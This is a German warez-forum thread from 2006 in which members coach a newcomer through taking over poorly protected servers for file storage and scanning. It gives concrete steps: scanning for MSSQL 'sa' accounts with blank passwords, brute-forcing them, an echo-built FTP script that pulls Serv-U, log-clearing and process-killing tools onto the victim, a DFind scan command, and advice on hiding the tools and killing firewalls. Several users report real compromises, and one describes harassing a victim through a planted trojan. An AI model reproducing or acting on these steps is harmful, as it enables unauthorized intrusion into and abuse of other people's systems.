Vollständige Version anzeigen : Stro scannen


Scarface
29.06.2006, 04:58

hiho und wieder brauch eure hilfe ^^

ich würde mir gern einen Stro zu legen (ohne irgend jemanden anzubetteln) das heisst ich will mir einen bauen oder auch hacken oder scannen

was brauch ich dafür und welche sicherheits maßnahmen muss ich ergreifen
habe schon die tuts durch geschaut und die SuFu genutzt aber nichts wirkliches gefunden gegooget hasch auch schon und war auch schon in einiegen foren unterwegs

vorzugsweise würde ich erstmal klein anfangen wollen (will es ja lernen und net innen schoss geworfen bekommen)



und bitte nur posten wenn ihr mir auch weiter helfen könnt um spam zu vermeiden :P


axo und warum ich en stro will, brauch, etc ist das ich es mühselig finde nach pups von meinem pc aus zu scannen


mastaalien
29.06.2006, 07:09

also so als laie würd ich dir empfehlen, dir n tut zu suchen wie man einen stro "hackt" (denke findest sogar hier im forum) dann gucken auf welchem port das basiert. halt nach diesem port scannen und bei den results die schritte aus dem tut probieren.


Scarface
29.06.2006, 07:15

Ähnliche Themen: Stro scannen Original von cool max du köänntest dir auch fürs erste auf einer asienseite oder so einen str0 "kaufen" also mit unechten daten Wenn m[...]
[FTP] Mit Grims Ping auf Stro scannen _._:::**°EraZoR° proudly present**:::_._ _._:::**Wie scanne ich mit Grims Ping auf einem Str0**:::_._ Hallo erstmal :), ich zeig euch i[...]
Stro scannen
ich habe schon nach tuts gesucht auch in diesem forum nur leider keine gefunden ^^


die_zarte
29.06.2006, 07:34

Original von Scarface
ich habe schon nach tuts gesucht auch in diesem forum nur leider keine gefunden ^^

Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/board-php?boardid=25)

~~moved to Hacking & Security~~


cool max
29.06.2006, 10:32

Original von Scarface
ich habe schon nach tuts gesucht auch in diesem forum nur leider keine gefunden ^^

lol?

was finde ich denn da? :D

Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=188786)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=128257)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=93982)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=31831)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=18332)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=13518)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=6671)
Bit-torrent-to, die größte deutsche Torrent Downloads Seite im Netz (_rrboard-bit-torrent-to/thread-php?threadid=93)

wenn de willst kannst du mich bewerten 8)


Scarface
29.06.2006, 10:42

ach lol ich bin ja doof^^

ich danke dir



edit: hab ein server gefunden wo kein nt pw drauf ist er hatt aber kein ftp zugang zumindestens hab ich kein port


cool max
29.06.2006, 11:11

Original von Scarface
ach lol ich bin ja doof^^

ich danke dir



edit: hab ein server gefunden wo kein nt pw drauf ist er hatt aber kein ftp zugang zumindestens hab ich kein port
du musst am besten mit DFind nach port 1433 scannen erstmal ;)


Frankie00rz
29.06.2006, 11:46

Sql heißt das große zauberwort wenn man noch nicht so viele erfahrungen hat , das 2 zauberwort heißt remote scannen da du ja keine abuse bekommen willst wegen dauer scannens-Oder scannst du von immer von deinem pc aus ? ;_) hoffentlich nicht , lustig wird es dann wenn du von deinem localen pc aus die sql`liste bruten willst _._. es geht also nicht ohne würde ich fast behaupten , oder wie geht es kleverer ?


Scarface
29.06.2006, 11:57

das heist wenn ich ein nt passwort scanne ist es eigentlich unnütz??

lol von wo aus soll ich sonnst scannen??? von nen stro?? :P

mit den bruten siets genauso aus das würde dann alles von meinem home pc aus gehen


mYnon
29.06.2006, 12:06

Wie andere schon sagen, brute lieber nicht von home aus, da man da sehr schnell Abuse-mails bekommen kann. DOch nicht einfach nur so, bitte hören si damit auf oder son Mist. Ab der zweiten Mail werden die schon agressiver und droher später sogar mit kündigung, weil das unter Brute-Force-Attacke fällt. Zumindest ist das bei T-Online undich denke das wird bei anderen auch so sein.

Mh_. scannen kanst eigentlich, wen du auf Abusemails stehst^^ Also da machen die soschnell nix, hab schon 11 (ohne Witz, da steht immer das gleiche drin und nix von Kündigung oder sonstwas).

Also such dir lieber nen remote_. ist die besser Lösung ;)


Scarface
29.06.2006, 12:31

gut aber wie komm ich an nem remote ran??


cool max
29.06.2006, 12:39

Original von mYnon
Wie andere schon sagen, brute lieber nicht von home aus, da man da sehr schnell Abuse-mails bekommen kann. DOch nicht einfach nur so, bitte hören si damit auf oder son Mist. Ab der zweiten Mail werden die schon agressiver und droher später sogar mit kündigung, weil das unter Brute-Force-Attacke fällt. Zumindest ist das bei T-Online undich denke das wird bei anderen auch so sein.

Mh_. scannen kanst eigentlich, wen du auf Abusemails stehst^^ Also da machen die soschnell nix, hab schon 11 (ohne Witz, da steht immer das gleiche drin und nix von Kündigung oder sonstwas).

Also such dir lieber nen remote_. ist die besser Lösung ;)

jap vor allem man kann scannen und sonst was machen. also ich scanne remote und kann spielen oder ich kann sogar meinen PC ausmachen^^

also ich sags dir so.

der erste str0 ist am schwersten zu bekommen. biete am besten was gutes. ich ahbe einen privaten deluxepass-com account geboten und dafür einen scanstr0 bekommen(danke) und jetzt habe ich 2 scanstr0s die rund um die uhr scannen.

wenn du erstmal einen hast bist du nicht mehr aufzuhalten :)


mYnon
29.06.2006, 12:40

Ja dazu müsste man das machen was du vorhast^^

Am besten fragst du erstmal jmd. ganz leib ob er die einen remote sprich scanstro geben kann.

Oder du kannst auch erstmal mit "xray" nach mssql und als user: sa scannen_.. da bekomst z_b. auf er 200,210,211er range nen paar results, die könntest dann haxxen, also das was du vorhast. das kannst auch lokal machen, also scannen. Aber um später halt erfolgreich zu sein, sollte man nen schönen remote haben und ne gute user/pwlist_..

_cool-max

ja das halt der nachteil, wenn manlokal scannst. Die leitung ist das erstmal gut beansprucht und man kann nicht rund um die uhr scannen, außer man lässt den pc an.


XTC
29.06.2006, 13:01

jo also ich würde an deiner stelle wie mein vorredner schon gesagt hat "xray" benutzen_..
du scannzt nach mssql sa/blank oder sa/sa
und nimm dan die 202 range da findeste 100te von resultz ist zwar scheiß china und japan und so aber fürs scannen reicht es ja erst mal davon bauste dir dan 2 scannstr0s oder mehr_.
dan kannste gezielte "fastlines" durchscannen eu und usa_..
wen du glück hast findeste dan was schnelles 10mbit+_.
so hab ich es damals gemacht und so würd ich es wieder machen_..
evt kann ich dir sogar nen scanstr0 geben^^pn


Scarface
29.06.2006, 13:02

Original von mYnon
Am besten fragst du erstmal jmd. ganz leib ob er die einen remote sprich scanstro geben kann.


genau das ist es ja was ich vermeiden wollte ^^ erstens weil ich es sonnst nie lerne und zweitens sehe ich immer wieder hir scriptkiddys die nach nem stro bettel _.-und hmm ich glaub das ich keins bin ^^ und ich eigentlich auch net auf das niveau runter wollte


_cool max zu bieten hab ich eh nix zummindestens irgentwelche account ^^


axo und wie siehts aus wenn ich remote scanne muss ich da proxy usen oder geht das so


Original von XTC
jo also ich würde an deiner stelle wie mein vorredner schon gesagt hat "xray" benutzen_..
du scannzt nach mssql sa/blank oder sa/sa
und nimm dan die 202 range da findeste 100te von resultz ist zwar scheiß china und japan und so aber fürs scannen reicht es ja erst mal davon bauste dir dan 2 scannstr0s oder mehr_.
dan kannste gezielte "fastlines" durchscannen eu und usa_..
wen du glück hast findeste dan was schnelles 10mbit+_.
so hab ich es damals gemacht und so würd ich es wieder machen_..
evt kann ich dir sogar nen scanstr0 geben^^pn

ok ich werds mal versuchen _.. das ist mal ein anfang
und wie sieht es mit X-Scan aus ist das auch ok ?

edit: ersmal 10ner verteilen :P


mYnon
29.06.2006, 13:36

kannst auch hscan benutzen^^ mit x-scan weiß ichs leider nicht_. hat das auch nen gui wo du username und das entsprechene, also mssql ausführen kannst?


Scarface
29.06.2006, 13:38

ja x-scan ist son ding :P


mYnon
29.06.2006, 13:46

ja das wäre dann vorerst die einfachste lösung_. einfach als user sa und mssql und dann kommste schon an die results ;)


Scarface
29.06.2006, 14:03

joa dann erstmal danke an euch alle


ich lass den trade ersmal offen denn ich wette da kommen noch einiege fragen auf euch zu :P


edit: achso was ist (was kann pssieren) wenn ich in die 202 range von der blacklist scanne??

RANGE 202 *
202_53_64-95_* Nettlinx (in) abuse
202_102_0-127_**CHINANET Jiangsu (cn) - China Telecom abuse
202_161_96-127_* Alphalink (au) abuse
202_174_32-47_* AirNet (au) abuse


daedalus
29.06.2006, 14:16

Original von Scarface
joa dann erstmal danke an euch alle


ich lass den trade ersmal offen denn ich wette da kommen noch einiege fragen auf euch zu :P


edit: achso was ist (was kann pssieren) wenn ich in die 202 range von der blacklist scanne??

RANGE 202
202_53_64-95_* Nettlinx (in) abuse
202_102_0-127_* CHINANET Jiangsu (cn) - China Telecom abuse
202_161_96-127_* Alphalink (au) abuse
202_174_32-47_* AirNet (au) abuse


wayne_.. wenn du von DE CN scannst, beisst die das nen feuchten scheiss -_-


Frankie00rz
29.06.2006, 15:03

Original von daedalus

Original von Scarface
joa dann erstmal danke an euch alle


ich lass den trade ersmal offen denn ich wette da kommen noch einiege fragen auf euch zu :P


edit: achso was ist (was kann pssieren) wenn ich in die 202 range von der blacklist scanne??

RANGE 202
202_53_64-95_* Nettlinx (in) abuse
202_102_0-127_* CHINANET Jiangsu (cn) - China Telecom abuse
202_161_96-127_* Alphalink (au) abuse
202_174_32-47_* AirNet (au) abuse


wayne_.. wenn du von DE CN scannst, beisst die das nen feuchten scheiss -_-

Genau so sieht es aus , anderster sieht es aber aus wenn du das De aus in De/CH oder nähe machst.

_mYnon
Eine abuse gibt es vom isp wegen portscannens , bruteforce kann unter umständen einen polizeibesuch nach sich ziehen bei den falschen ranges,ja der erste stro oder scan remo ist immer der schwerste , aber hier im forum gibt es sicherlich ein paar nette leute die dir einen 1-5 mbitter zur verfügung stellen zum testen und erfahrungen sammeln , wir haben ja alle mal klein angefangen_.. asien ranges sind das beste spielfeld um anzufangen-bei fragen einfach den tread weiter führen_.


beatsix
29.06.2006, 15:43

also so ganz generell gesprochen

- reines portscanning ist nicht illegal. wenn sich ein gescannter admin gestört fühlt, gibts ne abuse an deinen provider, die dich dann meist dazu auffordern deinen pc vom bösenbösen trojaner zu befreien, der da portscans macht. daß da hausbesuche angeschlossen werden ist quatsch, da portscanning nicht illegal ist.

wenn du das hinauszögern willst kannst du stealthtechniken benutzen beim scannen. da gäbe es z_B. den SYN-scan, den z_B. nmap beherrscht der keine vollständigen connections aufbaut. bin mir nicht sicher, ob es windows IDS systeme gibt, die sowas erkennen, unter unix ist das problemlos möglich (dazu gibts ja fuer unix ziele dann xmas/fin/null scans ;))

so_. synscan hin oder her, das problem dabei ist, ich kenne nur nmap, was dazu in der lage ist, und nmap ist fuer solche zwecke die du verfolgst total ungeeignet, weil es extrem langsam arbeitet im vergleich zu z_B. dfind



ps: toller tip nach mssql zu scannen, wenn er schon nen ntpw gebruted hat_..
wenn du einen nt zugang gebrutet hast, musst du dich ins system einloggen_. das geht z_B. ueber einen telnetserver, wenn er laeuft (port 23), oder ueber irgendwelche netbios geschichten (das is dann schonwieder nicht mehr trivial_. da muss ich mit naeheren details auch passen)


mYnon
29.06.2006, 17:02

_Frankie00rz

Ja es kann einen Polizeibesuch nachsichziehen bei den falschen, aber nen Bekannter hat das auch gemacht,also lokal gebrutet, ab der 2-Mail wurden sie dann schon unfreundlicher sagen wir mal.
Und drohten mit Kündigung.

-> Fazit : besser remote^^

_beatsix.

mh_. hab ich wohl überlesen, dass er schon einen gebruteten NTPW hatte_.. verzeih^^



_Scareface

Wenn ud über die Ips auf der Blacklist scannst, lkannst du höchtwahrscheinlich nur ne Abuse bekommen , aber das auch im schlimmsten Fall. Denke ich mir mal so !

mfg und noch einen schönen sonnigen Tag ;)


cool max
29.06.2006, 20:34

Original von Scarface

Original von mYnon
Am besten fragst du erstmal jmd. ganz leib ob er die einen remote sprich scanstro geben kann.


genau das ist es ja was ich vermeiden wollte ^^ erstens weil ich es sonnst nie lerne und zweitens sehe ich immer wieder hir scriptkiddys die nach nem stro bettel _.-und hmm ich glaub das ich keins bin ^^ und ich eigentlich auch net auf das niveau runter wollte


_cool max zu bieten hab ich eh nix zummindestens irgentwelche account ^^


axo und wie siehts aus wenn ich remote scanne muss ich da proxy usen oder geht das so


Original von XTC
jo also ich würde an deiner stelle wie mein vorredner schon gesagt hat "xray" benutzen_..
du scannzt nach mssql sa/blank oder sa/sa
und nimm dan die 202 range da findeste 100te von resultz ist zwar scheiß china und japan und so aber fürs scannen reicht es ja erst mal davon bauste dir dan 2 scannstr0s oder mehr_.
dan kannste gezielte "fastlines" durchscannen eu und usa_..
wen du glück hast findeste dan was schnelles 10mbit+_.
so hab ich es damals gemacht und so würd ich es wieder machen_..
evt kann ich dir sogar nen scanstr0 geben^^pn

ok ich werds mal versuchen _.. das ist mal ein anfang
und wie sieht es mit X-Scan aus ist das auch ok ?

edit: ersmal 10ner verteilen :P

du köänntest dir auch fürs erste auf einer asienseite oder so einen str0 "kaufen" also mit unechten daten so wie hellowenracer es gemacht hat. der hat nen vServer und der ist seit 4 woche online.

aber ist vieleicht riskannt. ich weiß es nicht. vieleicht kann ja mal einer zu sowas etwas sagen


Klapperkopp
29.06.2006, 21:06

Original von cool max

du köänntest dir auch fürs erste auf einer asienseite oder so einen str0 "kaufen" also mit unechten daten

Wenn mal jemand Provider sagen würde^^
Denn sowas such ich schon lange und kommt net mit Google -_-
PM würde auch reichen_._10er ist drin^^

DE-Provider gibts genug aber US-Provider oder einfach Provider außerhalb der EU, die man faken kann hab ich noch nie gefunden -_-


cool max
29.06.2006, 21:09

sagt mal

also ich scanne im moment remote die 60er und die 63er durch

da gibts auch viel ;)

naja

kjann mir einer mal asien und china ranges sagen?

bei mir wars so :D

an tag 1 meinen scanstr0 bekommen gleich angefangen die 209er zu scannen nach port 1433

die ersten results gleich gebrutet :D

so kahmen 3 results raus.

die gleich nem hacker gegeben und der hat mir remote zugang zu einem super server gemacht den ich gescannt hatte. der hatte 700 KB/s upload :D und 3,8 GHz 3 GB RAM 200 GB Festplatte und ein zu der zeit anscheinend dummer admin


dann gestern abend hat er unbewusst meinen 2424 port gesperrt ohne das er es wusste hat er also meinen server deaktiviert.

so ich hatte ja nen trojaner noch drauf und hab in als strafe geärgert mit bildschirm umdrehen oder startleiste weg und sowas. festplatte formatieren habe ich NICHT gemacht. das ist einfach zu vieß weil er konnte ja nichts dafür ;)

auf jedenfall bin ich jetzt traurig :(


Scarface
29.06.2006, 23:11

ok dann wieder danle für die antworten 10ner sind raus an die neuen :P

ok lieder ist der server down mit dem ntpw hmm schade hatte en goilen ping und stand in tiwan


ok habe jetzt 4 server mit sql pw ich werde dann mal die nächsten schritte einleiten ^^ muhahaha


ok wie siets mit proxy usen aus hbbt ihr da en program für was wirklich save iss also multiproxy ist komischerweise nur im browser aktiv ber wenn ich was über putty oder console mache ist meine ip immernoch da


cool max
30.06.2006, 00:27

Original von Scarface
ok dann wieder danle für die antworten 10ner sind raus an die neuen :P

ok lieder ist der server down mit dem ntpw hmm schade hatte en goilen ping und stand in tiwan


ok habe jetzt 4 server mit sql pw ich werde dann mal die nächsten schritte einleiten ^^ muhahaha


ok wie siets mit proxy usen aus hbbt ihr da en program für was wirklich save iss also multiproxy ist komischerweise nur im browser aktiv ber wenn ich was über putty oder console mache ist meine ip immernoch da

proxy ist für weicheier 8)


Scarface
30.06.2006, 00:51

hmm ok ich sach mal hoffentlich haste recht


so habe nun alle 5 server die ich gefunden hab getestet mit "SQLExec" un der echo methode

Echo Open 111_222_333_444 21>>FTP-txt
Echo Test>>FTP-txt
Echo Test>>FTP-txt
Echo Binary>>FTP-txt
Echo Lcd c:winntSystem32>>FTP-txt
Echo GET Serv-U-exe>>FTP-txt
Echo GET Serv-U-ini>>FTP-txt
Echo Quit>>FTP-txt
aber wenn ich die sachen eingegeben hab habsch keine antwort vom server bekommen
So jetzt Script starten.

ftp -n -v -s:c:ftpscr-txt

So jetzt müsst ihr paar Minuten warten. Man hat den Eindruck das Sqlexec abgekackt ist aber das ist nicht der Fall. Einfach warten.

Wenn alles geuppt ist bekommt ihr ungefaehr diese Meldung:

get serv-u-exe
get serv-u-ini
get clearlogs-exe
get kill-exe
get Fport-exe
bei mir kommt entweder SQL_NO_DATA oder connection refused


mYnon
30.06.2006, 00:52

:D geiler Comment :D_cool-max

No risk no fun oder wie?! ^^ hehe

Naja ich benutze auch kein Proxy oder besser gesagt habe keinen genutzt!

Wenn du mssql und dann noch Asia scannst, dann passiert da nich soviel ;)

edit:

Soweit ich weiß bekommt man da immer nur ein Ton zu hören wenn ein Kommand erfolgreich war.
Oder war das nicht so?! (kein plan davon^^)

Ich erkundige mich da mal, aber immer schön weiter scannern^^


Scarface
30.06.2006, 00:55

oh man 2 tage und ich steh immer noch am anfang


cool max
30.06.2006, 01:16

Original von Scarface
oh man 2 tage und ich steh immer noch am anfang

also wenn da SQL_ERROR oder so kommt dann heißt das glaube ich das einer den str0 schon gehackt hat und ihn selber so gesichert hat das mit ihn nicht mehr oder nur schwer nochmal hacken kann. also kannst du alle deine scans die du da hast vergessen^^

edit:

an mYnon:

no risk no fun das ist mein motto 8)


mYnon
30.06.2006, 01:21

naja du kannst se nicht ganz vergessen nur musst du dafür noch Erfahrung mitbringen_..

Ich glaub das war irgendwas mit der Shell, das die gelöscht ist und du eigentlich blind und noch nichtmals mit Garantie für Erfolg, alles blind schrieben musst oder so_. irgendwie war das so_.

Aber jeder anfang ist schwer, lass dich nicht unterkriegen^^ :D


Scarface
30.06.2006, 01:34

_mYnon
danke :)

und unterkriegen lass ich mich net ist hallt alles ein wenig stressieg da ich nicht mehr machen kann in der zeit zb. cs zocken oder so dennn ich will ja zu erfolg kommen und scanne ca 100-150 treads


mYnon
30.06.2006, 01:44

Kannst ja pc über nach laufen lassen oder wenn du nicht da bist_.

Ja das mit lokal scannen ist halt ein bisschen blöde_..

Aber sobald du deinen ersten scanstro hast, gehts voll ab^^


Scarface
30.06.2006, 01:52

naja ich hoffe nur das mein alice net rumspackt und naja er läuft über nacht aber auch wenn ich den ganzen tag am rechner sitze

und ja bis der stro da ist dauert das noch en bissl ^^ ich hoffe net mehr so lang grrr


cool max
30.06.2006, 03:02

Original von Scarface
naja ich hoffe nur das mein alice net rumspackt und naja er läuft über nacht aber auch wenn ich den ganzen tag am rechner sitze

und ja bis der stro da ist dauert das noch en bissl ^^ ich hoffe net mehr so lang grrr

wie gesagt ansonsten wenn du was gutes hast anbieten ;)vieleicht haste glück


Scarface
30.06.2006, 03:29

Original von cool max
wie gesagt ansonsten wenn du was gutes hast anbieten ;)vieleicht haste glück

löl ^^ hab nichts zumindestens nicht gutes^^ habe erst gerade 250giga pladde mit stuff geschrottet wegen dem scheiss macos_x

bin erst wieder am sammeln :P

edit: hab en server mit 2 cleanen accs gefunden

Vulnerability netbios-ssn (139/tcp)
NT-Server-Password - NT-Server-Password: "admin/[Blank password]"

Vulnerability netbios-ssn (139/tcp)
NT-Server-Password - NT-Server-Password: "pailin/[Blank password]"

was kann ich damit anfangen ?


mYnon
30.06.2006, 09:52

Mh_. das scheint mir ja nach NTPW auszusehen, da hat irgendwer in diesem Thread auch schon was drübergeschrieben,musste halt mal zurückblettern und gucken ;)


Wenn das nicht der Fall ist, kA :D


mfg

edit:Hab mal gegooglt nach Netbios hacking: ein Tut Klick (__-governmentsecurity-org/forum/lofiversion/index-php/t120-html)
Ist leider auf Englisch aber man kann es ja mal ausprobieren ;)^^

P_S_: Nach was scannst du denn alles?!"


Scarface
30.06.2006, 10:10

Original von mYnon
P_S_: Nach was scannst du denn alles?!"


nach allem was geht :P

ich scanne mit X-Scan v3_3 nach sql ntpw und neben bei scanne ich mit ScanSql (aber da hab ich kein glück)


mYnon
30.06.2006, 10:14

Schau mal nen Post drüber, da ist was ber NEtbios hacking in einem englischen Tut_.

Einfach mal google anschmeißen, auf english findest meistens was^^


PhyT0n
30.06.2006, 11:27

hmm ich hab über nacht mal nach mssql server gescannt und hab auch 5 results, müsste die jetzt noch bruten aber ich weiß nich direkt wie das geht? =/ also wissen schon nur wie ich es zu 100% mache nich =/
naja wäre nett wenn mir jemanden helfen könnte, gern auch per icq oder msn geht schneller, und ich denke das ich es auch schnell verstehen würde =/

hab auch schon im board und im netz gesucht aber irgendwie nich direkt was gefunden =/ (oder ich bin blind) ^^

hoffe meldet sich jemand! =)

Gr33tz+Thx PhyT0n


molli
30.06.2006, 11:32

hmm also ich hab damals nur von _ home gescannt und die irgendwelche probs gehabz weder beim scannen noch beim bruten aber egal is ja eure meinung

also ich würde sagen für den anfang ein fach mal mit dfind oder so nach offenen 1433 ports scannen die dann mit sqlck bruten
dann mit sqlexec sehen ob kein error weil den wirst du wohl noch nicht weg bekommen
wenn kein error filez druff und server starten wenn es immer noch nicht geht firewall killen oder sehen ob router dazwischen wenn du dir net sicher bist ob nen router da is einfach dein prog(serv-u,etc_)mal auf port 21 laufen lassen wenn es immer noch net geht nächster scann usw.


Scarface
30.06.2006, 11:37

Original von PhyT0n
hmm ich hab über nacht mal nach mssql server gescannt und hab auch 5 results, müsste die jetzt noch bruten aber ich weiß nich direkt wie das geht? =/ also wissen schon nur wie ich es zu 100% mache nich =/
naja wäre nett wenn mir jemanden helfen könnte, gern auch per icq oder msn geht schneller, und ich denke das ich es auch schnell verstehen würde =/

hab auch schon im board und im netz gesucht aber irgendwie nich direkt was gefunden =/ (oder ich bin blind) ^^

hoffe meldet sich jemand! =)

Gr33tz+Thx PhyT0n

Open Port 1433 bruten [MSSQL] bitte^^


hmm also ich hab damals nur von _ home gescannt und die irgendwelche probs gehabz weder beim scannen noch beim bruten aber egal is ja eure meinung

also ich würde sagen für den anfang ein fach mal mit dfind oder so nach offenen 1433 ports scannen die dann mit sqlck bruten
dann mit sqlexec sehen ob kein error weil den wirst du wohl noch nicht weg bekommen
wenn kein error filez druff und server starten wenn es immer noch nicht geht firewall killen oder sehen ob router dazwischen wenn du dir net sicher bist ob nen router da is einfach dein prog(serv-u,etc_)mal auf port 21 laufen lassen wenn es immer noch net geht nächster scann usw.

häääääääääääää?? hast du schon mal gelesen was du da schreibst?? next time plz verständlicher


mYnon
30.06.2006, 11:55

Der hat ne KUrzbeschreibung von den einzelnen Schritte gemacht :D

Dfind = Portscanner der über DOS läuft bzw. nur über ne Commandline(?)
Also er guckt nur ob der Port offen ist und nicht ob ein Weakaccoutn sprich wie z_b. sa vorhanden ist.

Dann Sqlck ist nen SQLbruter wie der Name schon sagt. Auch über Commandline(?).

Die benutzt man meistens(denk ich mir mal so) um per remote nach sqls zu scannen/bruten.

Ja sqlexec müsste eigentlich wissen was das ist ^^

Und dann hat er halt beschrieben, dass man gucken sollte ob der SQL ne SQL Error hat und wenn nicht einfach das machen was auch in den Tuts steht.

:D

mfg

_molli Die Zeiten haben sich halt geändert :P :D


PhyT0n
30.06.2006, 12:17

So also hab alles gemacht und hab 2 die sind total in ordnung,kein error etc. und gebrutet sind die auch!
einen möchte ich falls es möglich is als scanstro benutzen und den anderen für stuff
nur wie secure ich die dsa mir die auch keiner wegnehmen kann? und wie bau ich mir darauf nen scanstro und nen schönen ftp server? =/ hab ihr mal was gesehen find das aber leider nich mehr :(
hoffe mir kann dabei noch jemand helfen =/

gr33tz+thx, 10ner wurden verteilt und gibts weiterhin für jede hilfe!!


//Edit: hab wohl was übersehen, ist nur einer der in ordnung ist der andere zeigt mir leider nen error an =/

aber dafür hat er schöne festplatten wie z_b. c,d,e,f,g ^^
werd nachher mal das tut durchgehen und das machen, will jetzt erstmal bissle zocken *g*

gr33tz+thx PhyT0n


mYnon
30.06.2006, 12:25

Guck am besten in der TutSektion bei Leecher Upper Support_..

EInfach Stro securen und haxxon von mssql suchen ;)

Und hier auch ein Tut vom Haxxen bis zum securen

Klick_. (_web59-server57-rhs-it-de/wbb2/print-php?threadid=682&page=1&sid=)


cool max
30.06.2006, 13:31

Original von molli
hmm also ich hab damals nur von _ home gescannt und die irgendwelche probs gehabz weder beim scannen noch beim bruten aber egal is ja eure meinung

also ich würde sagen für den anfang ein fach mal mit dfind oder so nach offenen 1433 ports scannen die dann mit sqlck bruten
dann mit sqlexec sehen ob kein error weil den wirst du wohl noch nicht weg bekommen
wenn kein error filez druff und server starten wenn es immer noch nicht geht firewall killen oder sehen ob router dazwischen wenn du dir net sicher bist ob nen router da is einfach dein prog(serv-u,etc_)mal auf port 21 laufen lassen wenn es immer noch net geht nächster scann usw_

leichter gesagt als getahn. man macht das ja mit Fport-exe richtig?

wennn ich die immer ausführen will dann sagt er das ich ein admin oder so sein muss um das auszuführen X(


weixi2
30.06.2006, 14:03

Dann nimm openports-exe, mit folgendem aufruf:

openports -lines -fport

Zu den SQLErrors:
Es gibt verschiedene Arten, wenn nur die xp_cmdshell weg ist, dann kann man die einfach neubauen. Wenn aber DLLs fehlen (xplog70-dll, odsole-dll) dann kannst du ihn vergessen (Ziemlich schwer die zu hacken)


Scarface
30.06.2006, 14:23

ok ich hab en server ^^ muhaha²

nun muss ich nurnoch versuchen den ftp zum laufen zu bekommen _.-wo bekomme ich die "fport" und die "openports-exe" her?? und ich hab unter net start gesehen das der ne nod antivirus prog drauf hat


******************
*****))) 4 (((***** - Securen SQL-spezifisch
*******************

Sucht die Datei "xpsql70-dll" und benennt sie um oder löscht sie. Umbenennen ist in jedem Fall netter ;o) . Ihr findet die Datei recht schnell mit

dir c:\xpsql70-dll /S

Nun können über den SQL-Server keine Befehle mehr im Betriebssystem ausgeführt werden, da er die Prozedur xp_cmdshell nicht mehr finden kann.
aber wie kann ich denn auf den server zu greifen und scannen lassen??


axo und der server hatt vnc drauf und sonn zeuch ist es möglich die psses zu ändern oder en 2ten admin an zu legen?? oder das nt pass auszulesen?


mYnon
30.06.2006, 14:56

Mh_.. mit einer Shell sprich SQLexec kannst auf den Server zugriefn_. weiter kann ich dir leider nicht helfen^^

Ehm_. und zum scannen_. Du musst ja erst den Serv-U zum laufen bekommen, dann connectest mit den Daten per FTp Progi auf deine Serv-u und dann lädst du die ganzen Dateien wie SQLck und dfind hoch aber auch noch hidden32-exe(dfind,sqlck verstecken) und kill-exe(prozess killen)


Scarface
30.06.2006, 16:26

ahhhhhhhhhhhhh ftp läuft !!!!!!!! muhahahaha goil

so nun noch den rest ^^




lol und wieder down


nun ist der ftp on aber ping kann ich net lol


FrEeDoMe
30.06.2006, 16:27

Na dann gratulation zu deinem ersten Stro und viel Spaß beim weiter scannen, hacken, bruten etc.

_ Topic

Ich brute regelmässig von einem Rechner aus und die Telekom hat noch keinen Finger gerührt.


mYnon
30.06.2006, 16:39

Mh_.. dann bist du einer der wenigen die nicht auffällig werden_. ich weiß ja nicht aber ein kollege hat 2mails deswegen bekommen und da wurde schon mit Küdnigung gedroht, auch T-COm

_Scareface_..

Weiter so^^


Scarface
30.06.2006, 16:43

so nun da der ftp läuft will ich den nun auch saven

meine fragen:
wie kann ich den telnet öfnen ??
und wie kann ich den server steuren _-scannen und so wenn ich des save

*******************
*****))) 4 (((***** - Securen SQL-spezifisch
*******************

Sucht die Datei "xpsql70-dll" und benennt sie um oder löscht sie. Umbenennen ist in jedem Fall netter ;o) . Ihr findet die Datei recht schnell mit

dir c:\xpsql70-dll /S

Nun können über den SQL-Server keine Befehle mehr im Betriebssystem ausgeführt werden, da er die Prozedur xp_cmdshell nicht mehr finden kann.


mYnon
30.06.2006, 17:07

Zum scannen das hab ich oben irgendwoe geschrieben_.. mit aufn ftp die progs uppen und so_..

Das securen musste über die shell machen, als per sqlexec _..

mfg

Ich erkündige mich mal_.. falls nicht schon wer anders das hier reinschriebt ^^

Aber jezze bin ich Fußball gucken,_.. also haun se rein^^

Telnet öffnest du per cmd_. betätige mal google_.


Scarface
30.06.2006, 17:27

Original von mYnon
Zum scannen das hab ich oben irgendwoe geschrieben_.. mit aufn ftp die progs uppen und so_..

Das securen musste über die shell machen, als per sqlexec _..

mfg

Ich erkündige mich mal_.. falls nicht schon wer anders das hier reinschriebt ^^

Aber jezze bin ich Fußball gucken,_.. also haun se rein^^

Telnet öffnest du per cmd_. betätige mal google_.

1. hoch laden ok aber wie sind die befehle? macch ich das über flashfxp prog oder brauch ich da en extra tool?

2. shell?? telnet oder wie?

3. ja das mit telnet ist klaar würde dann putty nehmen aber wie starte ich den telnet server??


FrEeDoMe
30.06.2006, 17:42

Befehl für DFind-exe müsste so aussehen:

exec DFind-exe -p 139 254_0_0_0 255_0_0_0

Grün = Der Port welcher gescannt werden soll_

Blau = Die Range welche gescannt werden soll_


Scarface
30.06.2006, 18:42

super danke


so nach fast 60 trads könn wa wohl so langsam schließen

es wurden alle meine frage mehr oder weniegr beantwortet (eher mehr)

1. ich danke allen die mir tips und hilfen gegeben haben (also alle :P) 10ner sind selbst verstänlich raus

2. es hatt alles geklappt wie ich es wollte mal schaun wie es nun weiter geht

3. ich denke mal das ich früher oedr später noch mehr fragen haben werde aber dazu mach ich dann wieder en neuen trade auf :P _._. nach dem ich die SuFu genutzt hab



geschaft _.. Scarface hattn stro :D:D:D

öhhm ich mein sicherheitslücke endeckt ----> ist auch gerade am email schreiben um sie zu melden :P


Copy
01.11.2006, 06:58

brauchte mal das tutorial zum securen
_.-bedanko hat leider nich so richtig gefunzt

greetz
Copy


nitram
25.02.2007, 22:02

//sorry sollte gar nicht hier rein




raid-rush.ws | Imprint & Contact pr